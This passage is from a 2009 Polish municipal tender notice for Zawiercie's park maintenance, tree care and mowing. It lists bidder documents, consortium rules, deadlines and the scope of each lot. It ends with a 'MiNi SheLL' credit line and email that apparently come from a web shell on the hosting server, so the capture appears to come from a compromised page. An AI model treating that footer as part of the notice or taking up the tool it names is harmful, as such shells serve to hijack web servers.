4)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (sporządzony wg wzoru stanowiącego załącznik nr 9 do SIWZ) - w zakresie zadania (części) nr 1-3.
Do wykazu należy dołączyć dokumenty potwierdzające kwalifikacje pracowników.
5)	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca, sporządzony według wzoru stanowiącego załącznik nr 10 do SIWZ - w zakresie zadania (części) nr 1-3.
6)	Polisę, a w przypadku jej braku inny dokument potwierdzający, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności                       - w zakresie zadania (części) nr 1-3.

Ponadto Wykonawca złoży wraz z ofertą:
7)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 6 do SIWZ     - w zakresie zadania (części) nr 1-3.
8)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 11 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu) - w zakresie zadania (części) nr 1-3.
9)	Kosztorys ofertowy sporządzony w oparciu o otrzymany kosztorys ślepy (przedmiar robót) (załącznik nr 5 do SIWZ) - jedynie w zakresie zadania (części) nr 1. 

W/w dokumenty winny być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę z umieszczoną klauzulą za zgodność z oryginałem.
Wykonawcy mogą wspólnie ubiegać się o udzielnie niniejszego zamówienia, a wszystkie warunki udziału w postępowaniu, o których mowa w pkt. V SIWZ muszą spełniać oni łącznie. Ich potencjały ludzkie, techniczne, wiedza i doświadczenie, a także sytuacja ekonomiczna i finansowa zostaną zsumowane, aby mogli spełniać warunki udziału w postępowaniu. Przy ocenie spełnienia warunków udziału w postępowaniu, o których mowa w pkt V przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunków będą zsumowane.
Nie spełnienie powyższych wymagań spowoduje wykluczenie wykonawcy.

Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące wymagania:
a)	oferta będzie zawierać informacje i dokumenty wymienione w punkcie VI ppkt 2,  dotyczące każdego partnera konsorcjum. Oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w ppkt 1 wykonawcy wspólnie ubiegający się o zamówienie złożą oddzielne lub wspólne;
b)	oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów;
c)	wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;
d)	wykonawcy wspólnie ubiegający się o zamówienie ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarciu umowy. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
e)	zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej     Polskiej stosuje się § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz.U. Nr 87, poz. 605 z późn. zm.) w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, Wydział Zamówień Publicznych - pokój nr 202..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2009 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2
Punkt Obsługi Interesanta (Informacja), parter UM..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 24.03.2009 r. Cena za SIWZ - 12,20 zł (w tym podatek VAT)..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie i pielęgnacja zieleni niskiej i średniej na terenach objętych stałą pielęgnacją o powierzchni 16,6808 ha (166 808 m2)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to będzie obejmować następujące czynności:
- pielęgnację trawników (o powierzchni 141 787 m2),
- wygrabianie liści z trawników jesienią (o powierzchni  141 787 m2),
- wykonanie obsady kwiatowej na 6 rabatach sezonowych i w 22 donicach 
(powierzchni  do obsady 866,5 m2) 43 325 sztukami kwiatów sezonowych:
x szałwia		- 21 655 sztuk, 
x aksamitka		- 12 050 sztuk,
x dalia		-   5 950 sztuk, 
x starzec 		-   2 250 sztuk, 
x gazania 		-   1 420 sztuk, 
- pielęgnację kwiatów sezonowych na 6 rabatach i w 22 donicach (o powierzchni  
866,5 m2), 
- pielęgnację bylin na rabatach (o powierzchni 88 m2),
- pielęgnację rabat obsadzonych różami 990 sztuk,
- wykonanie obsady bylinami zadarniającymi na rabatach cebulowych (powierzchnia 
53 m2),
- renowację 1 000 m2 trawnika w Parku im. Adama Mickiewicza,
- pielęgnację żywopłotów (o powierzchni 6653 m2),
- konserwację koryta rzeki Warty na terenie parków Mickiewicza i Kościuszki,
- utrzymanie czystości i porządku na terenach zieleni miejskiej (o powierzchni 16,6808 ha), 
- likwidację rabaty różanej (o powierzchni 19 m2) wraz z zastąpieniem jej trawnikiem,
- odmłodzenie skupin krzewów (o powierzchni 180 m2),
- wykonanie rabaty sezonowej koło pomnika Mickiewicza (o powierzchni 49 m2),
- usuwanie przez Wykonawcę na bieżąco odpadów ze sprzątania oraz resztek roślinnych pochodzących z wykonywanych zabiegów pielęgnacyjnych,
- konserwację 124 betonowo - drewnianych ławek na terenach zieleni podlegających stałej pielęgnacji, 
Wykonawca uwzględni koszt wody niezbędnej do realizacji przedmiotu zamówienia, który rozliczany będzie z Zamawiającym na podstawie wskazań liczników wodomierzowych zlokalizowanych na terenach zieleni. Strony ustalają, że w ciągu 14 dni do daty podpisania umowy Zamawiający przekaże Wykonawcy klucze do studzienek wodomierzowych zlokalizowanych na tych terenach. Z dniem przekazania kluczy Wykonawca ponosi odpowiedzialność za stan i dostępność do wymienionych studzienek. Zamawiający obciąży Wykonawcę kosztami pobranej wody z wymienionych studzienek na podstawie faktur, które otrzyma od przedsiębiorstwa wodociągowo-kanalizacyjnego odpowiedzialnego za dostawę wody.
Przedmiot umowy realizowany będzie przez Wykonawcę w oparciu o sporządzony przez Zamawiającego skonkretyzowany zakres prac na każde kolejne 14 dni, doręczony Wykonawcy bądź jego upoważnionemu przedstawicielowi z jednodniowym wyprzedzeniem.
Zobowiązany do osobistego stawiennictwa w siedzibie Zamawiającego, upoważniony przedstawiciel Wykonawcy potwierdzi pisemnie każdorazowo odbiór zakresu niezbędnych do wykonania prac.
Wykonawca zobowiązuje się pokryć ewentualne roszczenia użytkowników terenów zieleni za szkody będące następstwem zdarzeń losowych powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC.

Wykaz terenów zieleni miejskiej podlegających utrzymaniu i pielęgnacji jest ujęty 
w załączniku nr 1 do SIWZ i wzoru umowy.
Wykaz rabat sezonowych i donic obsadzonych kwiatami sezonowymi jest ujęty 
w załączniku nr 2 do SIWZ i wzoru umowy.
Wykaz rabat bylinowych jest ujęty w załączniku nr 3 do SIWZ i wzoru umowy.
Wykaz rabat różanych jest ujęty w załączniku nr 4 do SIWZ i wzoru umowy.

Opis przedmiotu zamówienia zawarty został również w kosztorysie ślepym (przedmiarze robót) - załącznik nr 5 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.60.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przegląd drzew nad ciągami pieszymi na terenach zieleni miejskiej podlegających stałej pielęgnacji wraz z wycinką 15 drzew oraz pielęgnacja 30 drzew o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie to będzie obejmować następujące czynności:
- zabezpieczenie terenu prac z zachowaniem wymogów bezpieczeństwa użytkowników terenu zieleni oraz sąsiadujących drzew i infrastruktury z uwzględnieniem oznakowania 
i zabezpieczenia przed dostępem osób trzecich,
- trzykrotny przegląd terenów zieleni w okresie trwania umowy, zdjęcie suchych, pękniętych oraz zawieszonych konarów, pocięcie wyrwanych drzew lub części koron zerwanych na skutek gwałtownych zjawisk atmosferycznych,
- wycinkę 15 drzew wraz z karczowaniem metodą frezowania na głębokość 20 cm poniżej poziomu gruntu, wycięte drzewa mają zostać złożone w miejscu wskazanym przez Zamawiającego w odcinkach o długości 3 m, 
- uprzątnięcie terenu po zakończeniu prac z gałęzi i innych odpadów powstałych podczas realizacji zadania, 
- każdy z przeglądów realizowany będzie w terminie wskazanym przez Zamawiającego, 
- wykonanie cięć sanitarnych, prześwietlających i redukcyjnych na 30 drzewach,
- szczegółowy zakres wykonywanych cięć według wskazania Zamawiającego,
- uprzątnięcie terenu po zakończeniu prac z gałęzi i innych odpadów powstałych podczas realizacji zadania.

W zakresie pielęgnacji 30 drzew o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm:
- 30 drzew o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm wskazanych przez Zamawiającego do pielęgnacji to drzewa wymagające specjalistycznych zabiegów pielęgnacyjnych ze względu na utrzymanie charakteru Parku im. Mickiewicza, a ponadto ze względu na bezpieczeństwo użytkowników i sąsiadującej infrastruktury,
- drzewa zlokalizowane są w większości na skarpach oraz nieutwardzonych częściach Parku, do których utrudniony bądź niemożliwy jest dojazd  ze względu na miękkie podłoże i zlokalizowane tam skupiny krzewów bądź bliskość innych drzew,
-szacowana wysokość miejsc prowadzenia prac zawierać się będzie pomiędzy 
10 a 24 m wysokości.
W związku z powyższym z uwagi na utrudnioną możliwość dojazdu do drzewa objętego pielęgnacją oraz zachowanie stanu sąsiadujących drzew i bezpieczeństwo dla sąsiadującej infrastruktury, a także ze względu na powierzchnię terenu (trawniki i inne powierzchnie nieutwardzone, pochyłości i nierówności) Zamawiający wskazuje, że wykonanie zabiegów pielęgnacyjnych w oparciu o zwyżkę może okazać się bardzo trudne lub niemożliwe. Dlatego też wskazuje się na użycie lin do opuszczania odciętych konarów, ponieważ zrzucanie gałęzi bez asekuracji linowej doprowadzić może do zniszczenia konarów w niższych partiach drzewa (zadarcia kory i obłamania). 
Celem cięć jest przywrócenie właściwej statyki drzew, utrzymanie ich dobrego stanu zdrowotnego, zmniejszenie podatności na wyłamanie.
Cięcia do zastosowania to:  
x cięcia sanitarne - usunięcie konarów suchych porażonych i krzyżujących się,
x cięcia redukcyjne - zminimalizowanie obciążeń pnia przez równomierne rozmieszczenie masy korony,
x cięcia prześwietlające - zmniejszenie masy korony tak, aby zmniejszyć podatność drzewa na uszkodzenia powstałe na skutek uderzeń wiatru.

Zakres prowadzonych cięć może doprowadzić do redukcji maksymalnie 20% masy korony.
Drzewa wyznaczone do pielęgnacji w większości należą do gatunków o twardym drewnie tj. robinie akacjowe, dęby szypułkowe, klon zwyczajny, wiąz szypułkowy: 
1.	robinia akacjowa na skarpie przy ul. Leśnej, 
2.	robinia akacjowa na trawniku koło skupin krzewów,
3.	lipa drobnolistna trawnik koło skupin krzewów, miękkie podłoże,
4.	lipa drobnolistna trawnik koło skupin krzewów, miękkie podłoże,
5.	robinia akacjowa na skarpie przy ul. Leśnej, 
6.	lipa drobnolistna mocno pochylona, 
7.	modrzew europejski - gęsta korona lekko pochylony, miękkie podłoże,
8.	lipa drobnolistna - ostre kont wrośnięcia konarów brak możliwości dojazdu z alejek, miękkie podłoże,
9.	dąb szypułkowy - brak możliwości dojazdu, miękkie podłoże skupiny krzewów,  
10.	dąb szypułkowy - brak możliwości dojazdu, miękkie podłoże skupiny krzewów,   
11.	dąb szypułkowy - dojazd z alejki ubytek po zerwanej części korony,
12.	olcha czarna - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
13.	dąb szypułkowy - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
14.	dąb szypułkowy - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
15.	dąb szypułkowy - dojazd z alejek,
16.	dąb szypułkowy - dojazd z alejek,
17.	dąb szypułkowy - możliwość dojazdu do drzewa z alejki,
18.	dąb szypułkowy - miękkie podłoże sąsiedztwo kręgu tanecznego, skupiny krzewów, korony sąsiadujących drzew,
19.	lipa drobnolistna - miękkie podłoże, sąsiedztwo skupin krzewów, 
20.	dąb szypułkowy - miękkie podłoże, nasadzenia hedery,
21.	wiąz szypułkowy - miękkie podłoże, rozłożysta korona częściowo nad korytem Warty,
22.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi, 
23.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi,
24.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi,
25.	klon zwyczajny - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
26.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
27.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
28.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
29.	dąb szypułkowy - dojazd z alejki, korona rozbudowana w kierunku budynku,
30.	dąb szypułkowy - dojazd z alejki, sąsiedztwo budynku.

Wykonawca zobowiązuje się pokryć ewentualne roszczenia użytkowników terenów zieleni za szkody będące następstwem zdarzeń powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koszenia na terenach gminnych nie podlegających stałej pielęgnacji..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowe zadanie obejmować będzie koszenia na terenach gminnych wraz z wygrabieniem i wywozem pokosu według wskazania Zamawiającego. 
Powierzchnia przewidywana do koszenia - 10 ha. 
Zamawiający zastrzega sobie prawo nieobjęcia zamówieniem do 50% powierzchni przedmiotu zamówienia, co wiąże się z tym, że wykonawca nie otrzyma w takim przypadku wynagrodzenia za przedmiotową część.
Przedmiot umowy będzie realizowany na podstawie każdorazowych pisemnych zleceń Zamawiającego, w których zostanie wskazana powierzchnia i lokalizacja terenu do skoszenia.
Wyznacza się termin realizacji każdorazowego zlecenia na 14 dni roboczych od daty jego otrzymania.
Wykonawca zobowiązuje się pokryć ewentualne roszczenia za szkody będące następstwem zdarzeń losowych powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com